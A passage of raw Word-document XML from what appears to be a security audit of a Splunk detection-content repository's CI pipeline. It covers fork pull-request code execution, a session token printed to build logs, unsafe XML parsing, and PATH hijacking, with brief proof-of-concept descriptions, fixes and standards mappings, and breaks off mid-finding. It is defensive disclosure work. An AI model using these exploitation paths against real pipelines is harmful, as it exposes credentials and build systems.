      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>${{ github.event.pull_request.number }}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is a safe integer; the risk is the execution model itself plus CI-01's injection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: fork contributor → PR head checkout → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>contentctl-ng build/test</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and (via CI-01) shell. Secrets are not present on fork runs, but runner compromise, cache poisoning, and artifact poisoning remain. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Conditionally exploitable</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (defense-in-depth + depends on runner isolation). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: open a fork PR touching </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>detections/**</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; the approved run executes the PR's content pipeline on the runner. (CI-01 gives the concrete code-exec primitive.) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: keep untrusted-code test jobs on ephemeral GitHub-hosted runners (not a persistent/self-hosted pool); require manual approval for all outside collaborators (repo Settings → Actions → "Require approval for all external contributors"); drop </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>GITHUB_TOKEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>permissions: {contents: read}</w:t>
      </w:r>
      <w:r>
        <w:t>; do not upload PR-built artifacts under names other jobs auto-consume, or scope artifact retention; isolate Docker to the job. Fix CI-01 as above. Document that fork content is run in a disposable sandbox.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-829 Inclusion of Functionality from Untrusted Control Sphere; CWE-94 Improper Control of Generation of Code (Code Injection) (2024 CWE Top 25 #11). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A08:2021 Software and Data Integrity Failures. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1195.002 Supply Chain Compromise: Compromise Software Supply Chain. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SA-15 Development Process, Standards, and Tools, SC-7 Boundary Protection, CM-2 Baseline Configuration. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.31 Separation of development, test and production environments, A.8.25 Secure development life cycle. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CI/CD / System Configuration.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CI-03 — Splunkbase session token printed to CI logs by ta_update.py</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 6.5). Exploitability: Exploitable as information disclosure to log readers.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .github/workflows/ta_update.py:441-442</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>441: token = SplunkAppSessionToken.get_splunk_base_session_token()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>442: print(f"Obtained Splunk Base session token: {token}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: The script authenticates to Splunkbase with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SPLUNK_BASE_USERNAME/PASSWORD</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (lines 310-340) and obtains a session token, then prints the full token value to stdout. Running under </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>update_splunk_tas.yml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, stdout goes to the Actions run log. Anyone able to read the workflow logs (org members, and the logs of a public repo are world-readable unless restricted) obtains a live Splunkbase session token usable as </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>X-Auth-Token</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (line 478) to download apps as that account. GitHub secret-masking only masks registered secret values; a token *derived at runtime* is not auto-masked, so it appears in cleartext. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: not attacker-triggered (scheduled job), but it is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sensitive-data exposure in logs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Source = Splunkbase auth → token → </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>print</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → run log → any log reader. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Exploitable as information disclosure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (precondition: log read access; for a public repo that is anonymous). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: inspect the "Run Python Splunk TA checker" step log; the line </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Obtained Splunk Base session token: &lt;token&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> reveals it. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t>: remove the value from logs.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>token = SplunkAppSessionToken.get_splunk_base_session_token()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>print("Obtained Splunk Base session token (redacted).")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># if a masking hint is desired in GH Actions:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>print(f"::add-mask::{token}")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Never log credential material; optionally emit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>::add-mask::</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> before first use so any accidental later echo is masked too.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-532 Insertion of Sensitive Information into Log File; CWE-312 Cleartext Storage of Sensitive Information. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A09:2021 Security Logging and Monitoring Failures, A04:2021 Insecure Design. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1552.001 Unsecured Credentials: Credentials In Files. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> AU-9 Protection of Audit Information, SC-28 Protection of Information at Rest, IA-5 Authenticator Management. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.DS Protect - Data Security, PR.AA Protect - Identity Management, Authentication, and Access Control. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.12 Data leakage prevention, A.8.15 Logging. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CI/CD / Error Handling and Logging.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CI-05 — XML parsing of remote responses without defusedxml and HTTP requests without timeout (ta_update.py)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Medium (CVSS v3.1 base 5.3). Exploitability: Not exploitable in normal operation (defence-in-depth).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .github/workflows/ta_update.py:9,17,245,281,322,338,479</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338:   root = ET.fromstring(response.content)</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479:   response = requests.get(download_url, headers=headers)   # no timeout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Responses from </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>splunkbase.splunk.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>apps.splunk.com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> are parsed with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>xml.etree.ElementTree.fromstring</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Bandit B314) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>xmltodict.parse</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Python's stdlib XML parsers do not resolve external general entities by default in modern CPython, but are still susceptible to internal entity-expansion / billion-laughs, and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>ET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the pattern Bandit flags for untrusted XML. The data source is a trusted vendor over HTTPS, so practical exploitation requires MITM or compromise of that endpoint. Separately, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>requests.get(download_url, ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (line 479) and the auth POST (line 322) set no </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, so a hung server stalls the job indefinitely (Bandit B113). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>urllib3.disable_warnings(InsecureRequestWarning)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (line 17) suppresses TLS warnings globally (verification itself remains on by default, but the suppression masks future misconfig). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Untrusted-input reachability</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: Splunkbase response → XML parser. Precondition: compromise/MITM of Splunkbase (TLS mitigates). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Verdict: Not exploitable in normal operation / defense-in-depth.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The missing timeout is a reliability (availability) weakness, exploitable only as a hang. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Proof of concept</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: N/A (requires malicious upstream XML). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Remediation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: use </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>defusedxml</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and add timeouts:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>from defusedxml.ElementTree import fromstring as safe_fromstring</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import defusedxml.expatbuilder  # or defusedxml.xmltodict wrapper</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>root = safe_fromstring(response.content)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext w:val="0"/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>response = requests.get(download_url, headers=headers, timeout=RetryConstant.RETRY_INTERVAL)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t xml:space="preserve">Keep </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>response.raise_for_status()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">; set an explicit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>timeout</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on every </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>requests</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> call; drop the blanket </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>disable_warnings</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Standards mapping.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CWE:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CWE-611; CWE-776; CWE-400 Uncontrolled Resource Consumption (2024 CWE Top 25 #24). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>OWASP Top 10 2021:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A05:2021 Security Misconfiguration, A06:2021 Vulnerable and Outdated Components. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MITRE ATT&amp;CK:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> T1499 Endpoint Denial of Service. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST SP 800-53r5:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SI-10 Information Input Validation, SC-5 Denial-of-Service Protection. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>NIST CSF 2.0:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PR.PS Protect - Platform Security. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ISO/IEC 27001:2022:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> A.8.26 Application security requirements. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SANS Secure Coding Practice:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CI/CD / Input Validation.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>CI-08 — External tools launched via partial executable path (PATH hijack) in pre-commit hook and scripts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Severity: Low (CVSS v3.1 base 4.2). Exploitability: Not exploitable in a clean environment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Location.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> .pre-commit-hooks/yamlfmt-hook.py:33-37,90-95,106-111; scripts/validate_yaml.py:36-40,112-117,301-306; scripts/enforce_yaml_field_order.py:63</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t># yamlfmt-hook.py:33</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:pBdr>
          <w:left w:val="single" w:sz="18" w:space="6" w:color="0B5CAB"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="120" w:right="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>for cmd in ['yamlfmt', 'yamlfmt.exe']:</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result = subprocess.run([cmd, '--version'], ...)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Description</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yamlfmt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>git</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="9C274A"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>yamllint</w:t>
